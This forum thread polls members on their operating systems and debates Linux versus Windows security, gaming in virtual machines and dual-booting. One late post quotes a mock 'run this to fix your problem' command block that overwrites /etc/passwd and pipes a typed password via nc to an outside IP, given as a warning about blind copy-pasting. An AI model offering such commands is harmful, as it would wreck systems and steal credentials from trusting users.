Who Here Uses Linux?

GEC: Discuss gaming, computers and electronics and venture into the bizarre world of STGODs.

Moderator: Thanas

Which OS do you have? (including multi-boots and frequently-used Virtual Machines)

Windows 2000 or lower
2%
Windows XP
23%
Windows Vista or 7
38%
Linux (too many types to list them individually)
25%
Macintosh
7%
Solaris
2%
BSD
3%
MINIX
No votes

Total votes: 175

phongn
Rebel Leader

Re: Who Here Uses Linux?

Post by phongn »

fajner1 wrote:I'm getting a new computer for my birthday. It will have 8GB of RAM, so I'll probably run Ubuntu as the main OS and run Win7 in Virtualbox, giving it 2-4GB of RAM.
The opposite might work better (especially if you get a real GPU or even the integrated one that Sandy Bridge uses).
noncredible
Padawan Learner

Post by noncredible »

I'm getting the Sandy Bridge i5-2500K

But I really don't want Windows as my main system. I don't trust it to not get a virus.
"Everything in this room is edible. Even I'm edible. But, that would be called cannibalism. It is looked down upon in most societies."
— Roald Dahl, Charlie and the Chocolate Factory

"And, if you should come upon this spot, please do not hurry on. Wait for a time, exactly under the star. Then, if a little man appears who laughs, who has golden hair and who refuses to answer questions, you will know who he is. If this should happen, please comfort me. Send me word that he has come back."
— Antoine de Saint-Exupéry, The Little Prince
Executor32
Jedi Council Member
Location: In a Georgia courtroom, watching a spectacle unfold

Post by Executor32 »

You'd have to try pretty hard to get one, I think. As long as you're using a decent antivirus and antispyware, you should have notthing to worry about.
どうして?お前が夜に自身お触れるから。
Long ago in a distant land, I, Aku, the shape-shifting Master of Darkness, unleashed an unspeakable evil,
but a foolish samurai warrior wielding a magic sword stepped forth to oppose me. Before the final blow
was struck, I tore open a portal in time and flung him into the future, where my evil is law! Now, the fool
seeks to return to the past, and undo the future that is Aku...
-Aku, Master of Masters, Deliverer of Darkness, Shogun of Sorrow
noncredible
Padawan Learner

Post by noncredible »

The thing is I don't want an anti-virus. Linux is designed with security in mind, Windows isn't. Not to mention Linux being more stable, among many other things.

I just don't want Windows as my main system. I intend to use it as little as possible, mainly for gaming.
"Everything in this room is edible. Even I'm edible. But, that would be called cannibalism. It is looked down upon in most societies."

"And, if you should come upon this spot, please do not hurry on. Wait for a time, exactly under the star. Then, if a little man appears who laughs, who has golden hair and who refuses to answer questions, you will know who he is. If this should happen, please comfort me. Send me word that he has come back."
TimothyC
Of Sector 2814

Post by TimothyC »

fajner1 wrote:The thing is I don't want an anti-virus. Linux is designed with security in mind, Windows isn't. Not to mention Linux being more stable, among many other things.

I just don't want Windows as my main system. I intend to use it as little as possible, mainly for gaming.
MSE makes security very, very, simple. When combined with it's low footprint it you won't see a performance hit at all. This is important relative to using Linux as the base system because if you run Windows in a VM you will see a performance hit in 3D applications.

If you really do want to play games in Windows, then dual booting is a better option than running it in a VM.
"I believe in the future. It is wonderful because it stands on what has been achieved." - Sergei Korolev
phongn
Rebel Leader

Post by phongn »

TimothyC wrote:MSE makes security very, very, simple. When combined with it's low footprint it you won't see a performance hit at all. This is important relative to using Linux as the base system because if you run Windows in a VM you will see a performance hit in 3D applications.
Games might not even run at all in a VM since most VM 3D drivers are limited in functionality. Worse, 3D drivers for Linux tend to be slower and more immature than their Windows' counterparts.
Executor32
Jedi Council Member

Post by Executor32 »

fajner1 wrote:The thing is I don't want an anti-virus. Linux is designed with security in mind, Windows isn't. Not to mention Linux being more stable, among many other things.

I think it's more because Windows has the vast majority of the market share so people actually bother making viruses and malware for it. When was the last time you heard of a Linux virus, other than that Android one a month or two back? As for being more stable, elaborate please. My system has been running constantly since I built it at the end of January, save for restarting for Windows/drivers updates and shutting it down to replace my motherboard with one with non-defective SATA ports (Cougar Point chipset, in case it wasn't obvious). Occasionally Firefox misbehaves and crashes, but other than that I've had no issues whatsoever.
どうして?お前が夜に自身お触れるから。
Long ago in a distant land, I, Aku, the shape-shifting Master of Darkness, unleashed an unspeakable evil,
but a foolish samurai warrior wielding a magic sword stepped forth to oppose me. Before the final blow
was struck, I tore open a portal in time and flung him into the future, where my evil is law! Now, the fool
Bounty
Emperor's Hand

Post by Bounty »

Win7 + MSE + common sense is as secure as Linux for all practical purposes.
noncredible
Padawan Learner

Post by noncredible »

Well, I could dual boot them. Reconfiguring the GRUB and such is a bit of a pain, but it's only a few terminal commands, so I probably will.

As for the Linux viruses thing, linky

Win7 + MSE + common sense is as secure as Linux for all practical purposes.
I don't use my computer practically. I have five or six Windows viruses sitting in my Downloads folder right now because I wanted to see whether I could run them using Wine. I am very good at [mostly accidentally] fucking Windows up, one way or another.

Executor32
Jedi Council Member

Post by Executor32 »

So don't download viruses just to see what happens? :roll:

Also, that article is over 7 years old, things have vastly improved since then.
どうして?お前が夜に自身お触れるから。
noncredible
Padawan Learner

Post by noncredible »

Executor32 wrote:So don't download viruses just to see what happens? :roll:
You missed my point. My point was that I'll accidentally screw up the registry or something. Of course, I'll probably just use Windows for gaming and such, so I probably won't be deleting files in the C:\WINDOWS folder...
Also, that article is over 7 years old, things have vastly improved since then.
True. But my opinion still stands. Windows is still too easy to accidentally screw up.

Executor32
Jedi Council Member

Post by Executor32 »

So don't muck about in the registry unless you know what you're doing? Your point is a stupid one for anyone with a functioning brain, since it's not exactly hard to avoid doing random shit like a fucking two-year-old. :lol:
どうして?お前が夜に自身お触れるから。
noncredible
Padawan Learner

Post by noncredible »

I know. The problem is I'm used to doing that, since you sometimes have to do that in Linux.

Although, since I don't intend to use Windows as the main system, only for gaming and such, this is all irrelevant.

phongn
Rebel Leader

Post by phongn »

fajner1 wrote:You missed my point. My point was that I'll accidentally screw up the registry or something. Of course, I'll probably just use Windows for gaming and such, so I probably won't be deleting files in the C:\WINDOWS folder...
Vista and 7 will attempt to protect you from yourself.
True. But my opinion still stands. Windows is still too easy to accidentally screw up.
Your opinion is wrong.
fajner1 wrote:I know. The problem is I'm used to doing that, since you sometimes have to do that in Linux.
So ... don't do that in other sanely-configured operating systems?
Ariphaos
Jedi Council Member

Post by Ariphaos »

My servers all run Debian for security and performance reasons. I have a Linux From Scratch machine that mostly sits and rots - it's an educational experience. And a Win2k machine that's currently in a state of permanent disassembly.

My laptop dual boots Debian and Windows XP Pro. My main desktop is XP 64 bit, which I use for games and graphics.
Give fire to a man, and he will be warm for a day.
Set him on fire, and he will be warm for life.
Xisiqomelir
Jedi Council Member

Post by Xisiqomelir »

fajner1 wrote:How many of you use Linux? And which distribution do you use?

Also, if you switched from another OS, why?
Macintosh user from 1986 until my 2004 17" MBP broke in 2007 (accidental, not due to HW failure). I built a cheapo C2D system and installed Debian on it as a hold-over, switched to Arch Linux last year and I still run that as my main machine.

New ThinkPad T420s coming in about a week or so, will probably put Debian or Ubuntu on that.

Will probably get a new Mac eventually too.
Starglider
Miles Dyson

Post by Starglider »

I've been running Linux on all my servers for the last ten years or so, various distributions but currently Debian. I have experimented with Linux on the desktop a few times, but I have never, ever been able to get any distribution to run hardware-accelerated 3D graphics with any degree of reliability. My main workstation and tablet have Windows 7, my laptop and assorted spare machines still have Vista.
noncredible
Padawan Learner

Post by noncredible »

phongn wrote:
fajner1 wrote:You missed my point. My point was that I'll accidentally screw up the registry or something. Of course, I'll probably just use Windows for gaming and such, so I probably won't be deleting files in the C:\WINDOWS folder...
Is it a significant improvement over XP? (this is a legitimate question, not sarcasm, I don't use Vista and 7 much, and I want to know whether they're worth buying once I get a new computer)

Your opinion is wrong.
Ok, you've established that Vista and 7 are more secure and less screw-up-able than XP. I'll admit that I was exaggerating about Windows' screw-up-ability.

phongn
Rebel Leader

Post by phongn »

fajner1 wrote:
phongn wrote:
Is it a significant improvement over XP? (this is a legitimate question, not sarcasm, I don't use Vista and 7 much, and I want to know whether they're worth buying once I get a new computer)
Yes.
Dominus Atheos
Sith Marauder

Post by Dominus Atheos »

phongn wrote:Yes.
Skgoa
Jedi Master

Post by Skgoa »

My desktop has Windows 7 for gaming and my laptop is a MacBook. I prefer the later for anything but playing games. I have tried several different linux distributions... I like my computers to work and my OS to not still have the same stupid issues several versions later, please. ;) Basicly, OS X gives me all the unixoidity I need as a computer scientist, yet using it it doesn't suck as much as linux. :lol:
http://www.politicalcompass.org/test
Economic Left/Right: -7.12
Social Libertarian/Authoritarian: -7.74

This is pre-WWII. You can sort of tell from the sketch style, from thee way it refers to Japan (Japan in the 1950s was still rebuilding from WWII), the spelling of Tokyo, lots of details. Nothing obvious... except that the upper right hand corner of the page reads "November 1931." --- Simon_Jester
Torben
Padawan Learner
Location: Somewhere just to the left of reality, or SW Florida

Post by Torben »

fajner1 wrote:
phongn wrote:
Yes. Had XP running on home desktop for 8 yrs, non stop (excepting physical moves, power outages, and hardware/software upgrades). Never had the OS crash, never a virus. Granted, kept reliable AV software running continuously. Now run Win7 on desktop and both laptops. Have had Server 2008 R1, Ubuntu 9-10 running on home server and Ubuntu 9.04, 9.10, and 10.04 on laptop while in school. Really like the granular control Linux provides, just wish the productivity software I need was readily available for it (AutoCAD and verticals mainly).

In any event, as everyone else has stated, if you plan to run Win7 for gaming, best not to do it in a VM. It will NOT work well at all. Dual boot, and as long as you install Win7 first, you really should not need to mess with GRUB at all. IIRC, Ubuntu 10.04 uses Grub 2.0, which should configure itself, and by everything I read at the time, it was recommended to modify it as little as possible.
“I prefer Gary,” the Centurion said. - Centurion GRY-237427, "The Hunted"

“This sucks,” Gary said, as the Land-Rams to either side exploded. “I will request a transfer from your command in our next life, Commander.” - Centurion GRY-237427, "The Hunted"

Give a man a match, you warm him for a day. Set him on fire, you warm him for the rest of his life - Terry Pratchett
Count Chocula
Jedi Council Member
Location: You've asked me for my sacrifice, and I am winter born

Post by Count Chocula »

Vista on my box, NT on my Netbook. I have to have Office and Outlook, so there you go. I rep a network video recorder manfacturer and most of their boxes use Linux, so I'm re-learning it for work purposes only.
The only people who were safe were the legion; after one of their AT-ATs got painted dayglo pink with scarlet go faster stripes, they identified the perpetrators and exacted revenge. - Eleventh Century Remnant

Lord Monckton is my heeerrooo

"Yeah, well, fuck them. I never said I liked the Moros." - Shroom Man 777
Ariphaos
Jedi Council Member

Post by Ariphaos »

Destructionator XIII wrote: "oh just open a terminal and run this:

sudo apt-get install pwnme-devel
pwnme -L 8089 &
`perl -e 'print ("wtf" =~ s/w/sudo echo toor|0 > /etc/passwd);'`
echo 'Password: ' ; read ; echo $REPLY | nc 133.7.101.4 10000

and it will fix your problem."

How many times does the newbie just copy/paste it without even looking at it? Besides, even if the newb looked at it, would he know what it does?
This is similar to 'here, just run this trojan' in Windows. Setup a fake clone of bleepingcomputer.com or whatever, swap out a letter and you have the same situation. I don't think there's much arguing that there are only so many solutions to user stupidity besides education.
Hah! Yeah, virus writers have a hard time doing certain things.... and so do legitimate programs and users. Who hasn't lost data with some random dot update in Linux software where they went and changed something?
I mostly use Linux for server purposes but, I've only lost data due to a RAID card failure, personally. Then again I've only used Debian for serious work in Linux.
Give fire to a man, and he will be warm for a day.
Set him on fire, and he will be warm for life.
StrikaAmaru
Youngling

Post by StrikaAmaru »

Win 7 at work, Win XP at home. I don't use Linux, not from any religious conviction, but because I'm a developer on the .Net platform, and I don't have much use for it (yes, I know about Mono).
(youtube) Hate mail with Dawkins. American slurs + British accent = brain-breaking hilarity.
Think "I", therefore I am.
(from a dream of mine)
----
My name is Elizabeth; I use StrikaAmaru as handler, since it's impossible to log in just about anywhere with my name.